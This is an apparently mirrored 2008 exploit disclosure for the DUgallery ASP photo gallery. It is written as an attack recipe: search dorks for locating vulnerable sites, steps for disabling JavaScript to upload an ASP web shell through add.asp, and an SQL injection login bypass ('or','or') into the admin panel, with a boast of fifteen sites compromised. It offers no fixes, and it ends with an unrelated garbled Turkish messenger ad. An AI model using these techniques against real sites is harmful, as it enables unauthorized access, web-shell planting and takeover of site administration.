Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20538
HistorySep 20, 2008 - 12:00 a.m.

DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities

2008-09-2000:00:00
vulners.com
42

###################################################################

DUgallery - ALL VERSIONS!

Discovered bay : Alemin_Krali

my blog: al3m.blogspot.com

inurl:pic.asp?iCat=

inurl:cat.asp?iCat=

#-# 1-Upload Bug [HIGH!!! %75 success] new!

1-OPEN firefox
2-tools > options > content> JavaScript Not Active! and save.re open firefox.

http://[site.com]/path/add.asp ==>>> upload your Asp shell

http://[site.com]/path/pictures/yourshell.asp ==>>> your address

#-# 2-SQL INJECTION ? [HIGH!!! %95 success]

try 15 site and result 15/15 :)

site.com/path/admin_default.asp

'a

Syntax error (missing operator) in query expression 'U_ID=''a' AND U_PASSWORD='''.

USERNAME:'or','or'
PASSWORD:

and submit! welcome to admin panel (:

###################################################################


Windows Live Messenger'эn iзin Ьcretsiz 30 Эfadeyi yьkle
http://www.livemessenger-emoticons.com/funfamily/tr-tr/